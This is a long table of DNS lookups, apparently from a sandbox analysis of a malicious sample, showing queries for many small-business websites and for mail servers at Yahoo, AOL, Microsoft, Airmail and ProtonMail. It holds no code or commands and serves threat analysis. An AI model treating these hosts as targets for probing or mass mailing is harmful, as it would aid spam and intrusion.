                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:44.578183889 CEST8.8.8.8192.168.2.40x650No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:44.578183889 CEST8.8.8.8192.168.2.40x650No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:44.578183889 CEST8.8.8.8192.168.2.40x650No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:44.578183889 CEST8.8.8.8192.168.2.40x650No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.3.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:44.840897083 CEST8.8.8.8192.168.2.40xddb3No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:44.938826084 CEST8.8.8.8192.168.2.40x4610No error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:45.716290951 CEST8.8.8.8192.168.2.40xfbe9No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:45.716290951 CEST8.8.8.8192.168.2.40xfbe9No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:46.353241920 CEST8.8.8.8192.168.2.40x3595No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:46.689501047 CEST8.8.8.8192.168.2.40x67b1No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:46.755050898 CEST8.8.8.8192.168.2.40xca3bNo error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:48.144398928 CEST8.8.8.8192.168.2.40x2047No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:48.144398928 CEST8.8.8.8192.168.2.40x2047No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:49.016309977 CEST8.8.8.8192.168.2.40xcda7No error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:49.016309977 CEST8.8.8.8192.168.2.40xcda7No error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:49.016309977 CEST8.8.8.8192.168.2.40xcda7No error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:49.016309977 CEST8.8.8.8192.168.2.40xcda7No error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:49.016309977 CEST8.8.8.8192.168.2.40xcda7No error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:49.514353037 CEST8.8.8.8192.168.2.40xf50Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:49.526146889 CEST8.8.8.8192.168.2.40x4a45No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:50.550961971 CEST8.8.8.8192.168.2.40x89b9No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:50.550961971 CEST8.8.8.8192.168.2.40x89b9No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:50.550961971 CEST8.8.8.8192.168.2.40x89b9No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:51.658528090 CEST8.8.8.8192.168.2.40xdac3Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:51.814471006 CEST8.8.8.8192.168.2.40x35acName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:52.069772959 CEST8.8.8.8192.168.2.40xe6e9No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:52.069772959 CEST8.8.8.8192.168.2.40xe6e9No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:52.074141026 CEST8.8.8.8192.168.2.40xdc97No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:52.203018904 CEST8.8.8.8192.168.2.40x2650No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:52.903023958 CEST8.8.8.8192.168.2.40xaa8cNo error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:53.102190018 CEST8.8.8.8192.168.2.40xe71aNo error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:53.745812893 CEST8.8.8.8192.168.2.40xf126No error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:53.762015104 CEST8.8.8.8192.168.2.40xf702No error (0)www.dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:53.762015104 CEST8.8.8.8192.168.2.40xf702No error (0)www.dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.279855013 CEST8.8.8.8192.168.2.40xc36No error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.279855013 CEST8.8.8.8192.168.2.40xc36No error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.529325962 CEST8.8.8.8192.168.2.40xa102No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.548708916 CEST8.8.8.8192.168.2.40x7487No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.665708065 CEST8.8.8.8192.168.2.40xd4dbNo error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.665708065 CEST8.8.8.8192.168.2.40xd4dbNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.665708065 CEST8.8.8.8192.168.2.40xd4dbNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.665708065 CEST8.8.8.8192.168.2.40xd4dbNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.665708065 CEST8.8.8.8192.168.2.40xd4dbNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.688210964 CEST8.8.8.8192.168.2.40xc5c5No error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:54.688210964 CEST8.8.8.8192.168.2.40xc5c5No error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:55.037965059 CEST8.8.8.8192.168.2.40xc896No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:55.205123901 CEST8.8.8.8192.168.2.40xaaebNo error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:55.338423967 CEST8.8.8.8192.168.2.40xd6f5No error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:55.338423967 CEST8.8.8.8192.168.2.40xd6f5No error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:55.498080015 CEST8.8.8.8192.168.2.40xd8ffNo error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:55.510493040 CEST8.8.8.8192.168.2.40xb5b1No error (0)www.x0c.com104.143.9.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:55.510493040 CEST8.8.8.8192.168.2.40xb5b1No error (0)www.x0c.com104.143.9.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:55.581027985 CEST8.8.8.8192.168.2.40x3710No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:55.986207962 CEST8.8.8.8192.168.2.40x255aName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:56.091650963 CEST8.8.8.8192.168.2.40xffbeNo error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:56.091650963 CEST8.8.8.8192.168.2.40xffbeNo error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:56.107311010 CEST8.8.8.8192.168.2.40xdff7Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:56.369573116 CEST8.8.8.8192.168.2.40x48a7No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:56.369573116 CEST8.8.8.8192.168.2.40x48a7No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:56.369573116 CEST8.8.8.8192.168.2.40x48a7No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:56.386764050 CEST8.8.8.8192.168.2.40x1166No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:56.386764050 CEST8.8.8.8192.168.2.40x1166No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.176768064 CEST8.8.8.8192.168.2.40x815eNo error (0)www.railbook.net103.224.212.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.373202085 CEST8.8.8.8192.168.2.40x3242No error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.373202085 CEST8.8.8.8192.168.2.40x3242No error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.663851976 CEST8.8.8.8192.168.2.40x65ccNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.663851976 CEST8.8.8.8192.168.2.40x65ccNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.835503101 CEST8.8.8.8192.168.2.40x106fNo error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:57.925652027 CEST8.8.8.8192.168.2.40xdedaNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.223714113 CEST8.8.8.8192.168.2.40xa9a3No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.401918888 CEST8.8.8.8192.168.2.40x7bfaNo error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.456137896 CEST8.8.8.8192.168.2.40x7529No error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.470993996 CEST8.8.8.8192.168.2.40x74a5No error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.602974892 CEST8.8.8.8192.168.2.40x51b7No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:58.966430902 CEST8.8.8.8192.168.2.40x2d5dNo error (0)www.koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.224358082 CEST8.8.8.8192.168.2.40x278eNo error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.399271011 CEST8.8.8.8192.168.2.40x9616No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.488310099 CEST8.8.8.8192.168.2.40x36c6No error (0)www.tc17.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.488310099 CEST8.8.8.8192.168.2.40x36c6No error (0)www.tc17.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.654530048 CEST8.8.8.8192.168.2.40x6e3dNo error (0)www.dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:59.654530048 CEST8.8.8.8192.168.2.40x6e3dNo error (0)www.dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.281419992 CEST8.8.8.8192.168.2.40xb257No error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.281419992 CEST8.8.8.8192.168.2.40xb257No error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.291511059 CEST8.8.8.8192.168.2.40x3deNo error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.578721046 CEST8.8.8.8192.168.2.40x9b99No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.663131952 CEST8.8.8.8192.168.2.40xf3c6No error (0)smtp.sbcglobal.yahoo.comsmtp-sbc.mail.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.663131952 CEST8.8.8.8192.168.2.40xf3c6No error (0)smtp-sbc.mail.yahoo.comsmtp1.sbc.mail.am0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.663131952 CEST8.8.8.8192.168.2.40xf3c6No error (0)smtp1.sbc.mail.am0.yahoodns.net67.195.12.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.663131952 CEST8.8.8.8192.168.2.40xf3c6No error (0)smtp1.sbc.mail.am0.yahoodns.net66.163.170.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:00.663131952 CEST8.8.8.8192.168.2.40xf3c6No error (0)smtp1.sbc.mail.am0.yahoodns.net66.218.88.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.377603054 CEST8.8.8.8192.168.2.40x620fNo error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.377603054 CEST8.8.8.8192.168.2.40x620fNo error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:01.455318928 CEST8.8.8.8192.168.2.40x8ab7No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:02.598002911 CEST8.8.8.8192.168.2.40xc053No error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:02.664539099 CEST8.8.8.8192.168.2.40x6170No error (0)www.x0c.com104.143.9.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:02.664539099 CEST8.8.8.8192.168.2.40x6170No error (0)www.x0c.com104.143.9.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:03.078356028 CEST8.8.8.8192.168.2.40xff9aName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:03.081553936 CEST8.8.8.8192.168.2.40xf3aNo error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:04.290653944 CEST8.8.8.8192.168.2.40x7631No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:04.422390938 CEST8.8.8.8192.168.2.40x9ae8No error (0)www.railbook.net103.224.212.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:04.567217112 CEST8.8.8.8192.168.2.40x4f88No error (0)www.tc17.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:04.567217112 CEST8.8.8.8192.168.2.40x4f88No error (0)www.tc17.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:05.954480886 CEST8.8.8.8192.168.2.40x1151No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:06.468986034 CEST8.8.8.8192.168.2.40x5dabNo error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:11.488668919 CEST8.8.8.8192.168.2.40x93caNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:11.488668919 CEST8.8.8.8192.168.2.40x93caNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:11.806334019 CEST8.8.8.8192.168.2.40x3359No error (0)smtp.compuserve.comeast.us.smtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:11.806334019 CEST8.8.8.8192.168.2.40x3359No error (0)east.us.smtp.aol.comsmtp.aol.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:11.806334019 CEST8.8.8.8192.168.2.40x3359No error (0)smtp.aol.comsmtp.cs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:11.806334019 CEST8.8.8.8192.168.2.40x3359No error (0)smtp.cs.comsmtp.aol.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:11.806334019 CEST8.8.8.8192.168.2.40x3359No error (0)smtp.aol.g03.yahoodns.net87.248.97.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:11.844564915 CEST8.8.8.8192.168.2.40x86feNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:11.844564915 CEST8.8.8.8192.168.2.40x86feNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:13.325861931 CEST8.8.8.8192.168.2.40x1754No error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:13.325861931 CEST8.8.8.8192.168.2.40x1754No error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:13.325861931 CEST8.8.8.8192.168.2.40x1754No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.165.108.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:13.325861931 CEST8.8.8.8192.168.2.40x1754No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.224.178.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:13.960815907 CEST8.8.8.8192.168.2.40xd6d3No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:13.960815907 CEST8.8.8.8192.168.2.40xd6d3No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:15.777632952 CEST8.8.8.8192.168.2.40x6839No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:16.516583920 CEST8.8.8.8192.168.2.40x7481No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:16.516583920 CEST8.8.8.8192.168.2.40x7481No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:16.934093952 CEST8.8.8.8192.168.2.40x2924No error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:17.570535898 CEST8.8.8.8192.168.2.40x27c7No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:19.292203903 CEST8.8.8.8192.168.2.40x950cNo error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:19.292203903 CEST8.8.8.8192.168.2.40x950cNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:19.292203903 CEST8.8.8.8192.168.2.40x950cNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.165.108.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:19.292203903 CEST8.8.8.8192.168.2.40x950cNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.224.178.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:20.437885046 CEST8.8.8.8192.168.2.40x88f9No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:20.437885046 CEST8.8.8.8192.168.2.40x88f9No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:20.845679045 CEST8.8.8.8192.168.2.40xa918No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:20.845679045 CEST8.8.8.8192.168.2.40xa918No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.018074036 CEST8.8.8.8192.168.2.40x6b03Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.084733963 CEST8.8.8.8192.168.2.40xb335Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.087515116 CEST8.8.8.8192.168.2.40x6222No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.087515116 CEST8.8.8.8192.168.2.40x6222No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.818731070 CEST8.8.8.8192.168.2.40x3142Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:24.664515972 CEST8.8.8.8192.168.2.40xefbaNo error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:24.671298027 CEST8.8.8.8192.168.2.40xb10aNo error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:25.387203932 CEST8.8.8.8192.168.2.40x2f84No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:25.387203932 CEST8.8.8.8192.168.2.40x2f84No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:26.378185987 CEST8.8.8.8192.168.2.40xcf8bNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:26.487719059 CEST8.8.8.8192.168.2.40xab63No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:26.645725965 CEST8.8.8.8192.168.2.40xa025No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:27.588258982 CEST8.8.8.8192.168.2.40x746fNo error (0)mail.protonmail.ch185.205.70.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:27.588258982 CEST8.8.8.8192.168.2.40x746fNo error (0)mail.protonmail.ch185.70.42.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:27.588258982 CEST8.8.8.8192.168.2.40x746fNo error (0)mail.protonmail.ch176.119.200.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:28.033732891 CEST8.8.8.8192.168.2.40x5ea7No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:28.033732891 CEST8.8.8.8192.168.2.40x5ea7No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:28.722402096 CEST8.8.8.8192.168.2.40xe23aNo error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:29.276369095 CEST8.8.8.8192.168.2.40xc026Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:30.180634022 CEST8.8.8.8192.168.2.40xe503Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
